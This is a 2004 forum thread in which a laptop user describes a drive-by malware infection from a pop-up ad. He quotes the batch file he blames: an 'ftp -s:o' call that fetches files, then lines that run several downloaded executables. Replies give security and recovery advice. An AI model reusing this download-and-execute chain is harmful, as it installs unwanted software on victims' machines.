DOS batch file from hell controlled my PC!!

Tags:
Last response: in Laptops & Notebooks
a b D Laptop
May 20, 2004 8:23:08 AM

Today while surfing the net with my Windows 98SE Compaq Armada 1700 laptop, I
encountered a website that displayed a popup add, that asked me a question with
two possible answers. I foolishly clicked one of the answers instead of
clicking away. After of which my computer screen turned blank, and then
started to flash after of which I received a DOS prompt, while something was
using the DOSFTP environment to connect to a site and download some apps and
install software on my computer. Its like my Computer was being controlled!!
I quickly ejected my PC network card from my laptop, and my computer froze. I
restarted and a bunch of .exe icons were on my desktop. I attempted to delete
all of them, but not all could be removed either from Windows or a DOS session
within Windows. It seemed the only way to rid the newely installed .exe files
was to reboot to the DOS command prompt. Once in a pure DOS session, I was
able to remove the .exe apps from my desktop.

It seems that this hassle was triggered by the batch file below. This batch
file executes even if you do not open it. I moved the file to the recycle bin,
and while moving it back to my PC it executed again.

So in order to disable it, I had to boot into a DOS prompt.

if not exist C:\WINDOWSstatuslog ftp -s:o
if exist install2.exe install2.exe
if exist infamous_downloader.exe infamous_downloader.exe
if exist 0021-bdl94126.EXE 0021-bdl94126.EXE
if exist CS4P028.exe CS4P028.exe
if exist silent.exe silent.exe

For future reference what should I do, to protect myself from problems like
this? I know I could try not clicking on anypopups, but lets face the facts.
There are some websites that auto-install software in the background when I
visit their site. Their does not seem to be a easy way around this. Heck,
I've even had sites auto-install files when using my Macintosh. But the files
were unable to execute since the Mac OS cannot read .exe files.

Thanks for any support;

Personally I do not know how people with newer floppyless/DOSless laptops
survive. How do they solve these kinds of problems, since they cannot boot
into a pure DOS mode, and since newer laptops lack a floppy disk drive, neither
can they boot into a DOS session easily. I personally would think twice before
purchasing a XP laptop.

John
May 20, 2004 7:21:56 PM

Protective measures include installing, running frequently, and checking for
updates frequently both anti-virus software and anti-spyware software. I use
free versions of AVG from Grisoft and AdAware from Lavasoft. They are both
very good programs.

In addition, computer users should also frequently check for and download
updates (critical updates, Windows updates, and driver updates) by clicking
on the Windows Updates button.

Regarding Windows XP, if you have the retail version, the XP CD disk is
bootable and can be used for re-formatting, etc.. So a floppy is not needed
for that purpose.

As far as laptops are concerned, an external or internal floppy drive can be
purchased and installed. Whether or not the OS is XP or not really has
nothing to do with it.

Hope this helps.
May 20, 2004 8:10:49 PM

Coolwater0009 wrote:

> Personally I do not know how people with newer floppyless/DOSless laptops
> survive. How do they solve these kinds of problems, since they cannot boot
> into a pure DOS mode, and since newer laptops lack a floppy disk drive, neither
> can they boot into a DOS session easily. I personally would think twice before
> purchasing a XP laptop.
>
> John

This has got to be a wind up, why would anybody be stupid enough to have
their browser set up to open script files, or any sort of executable
file for that matter, inline?

Also, why do you think you need a floppy to boot into dos, never heard
of bootable CDs?
A bootable Knoppix CD is very useful to have around ;)

Lee
--
Email address is valid, but is unlikely to be read.
a b D Laptop

Lee wrote:

> Coolwater0009 wrote:
>

>> Personally I do not know how people with newer floppyless/DOSless laptops
>> survive. How do they solve these kinds of problems, since they cannot
>> boot
>> into a pure DOS mode, and since newer laptops lack a floppy disk
>> drive, neither
>> can they boot into a DOS session easily. I personally would think
>> twice before
>> purchasing a XP laptop.
>> John
>>

> This has got to be a wind up, why would anybody be stupid enough to have
> their browser set up to open script files, or any sort of executable
> file for that matter, inline?
>
> Also, why do you think you need a floppy to boot into dos, never heard
> of bootable CDs?
> A bootable Knoppix CD is very useful to have around ;)
>
> Lee
Well, nobody is supposed to be stupid enough to do a Bios upgrade on
battery and run out of juice...And even you might one day click too fast
on the wrong attachment....

Unless you use NTFS, having a dos diskette (and the right ones) are a
lifesaver. I do not know about your Knoppix CD, any details would be
useful to more than one here.

Regards

--
John Doue
May 20, 2004 8:52:57 PM

John Doue wrote:
<snip>

> Well, nobody is supposed to be stupid enough to do a Bios upgrade on
> battery and run out of juice...And even you might one day click too fast
> on the wrong attachment....

Fair enough, I suspected the original post was a troll.
Apologies then ;)

Although my browser it set up to save *all* executable attachments to
disk - so I'd still have to further click on the downloaded file to
actually run it...

> Unless you use NTFS, having a dos diskette (and the right ones) are a
> lifesaver. I do not know about your Knoppix CD, any details would be
> useful to more than one here.

Knoppix is a Linux distro that runs entirely from the CD. It can access
NTFS partitions, but I find it most useful for helping to diagnose
whether a fault is software or hardware related without having to
reinstall Windows.
Of course it doesn't support all hardware devices, but it works with
enough to be useful.

Lee
--
Email address is valid, but is unlikely to be read.
May 21, 2004 5:11:46 AM

In article <20040520002308.13296.00000829@mb-m06.aol.com>, coolwater0009
@aol.com says...
> Personally I do not know how people with newer floppyless/DOSless laptops
> survive. How do they solve these kinds of problems, since they cannot boot
> into a pure DOS mode, and since newer laptops lack a floppy disk drive, neither
> can they boot into a DOS session easily. I personally would think twice before
> purchasing a XP laptop.

Make a CD that'll boot DOS. It's easy to do, faster than a floppy, and you
have access to 700MB of utilities, rather than 1.44MB.

----
Remove .panties to email.
Anonymous
a b D Laptop
June 9, 2004 1:07:22 AM

coolwater -- what was the name of this batch file and in what
directory did you find it? I was just blessed with the same batch
file and am losing my mind with it. Many thanks.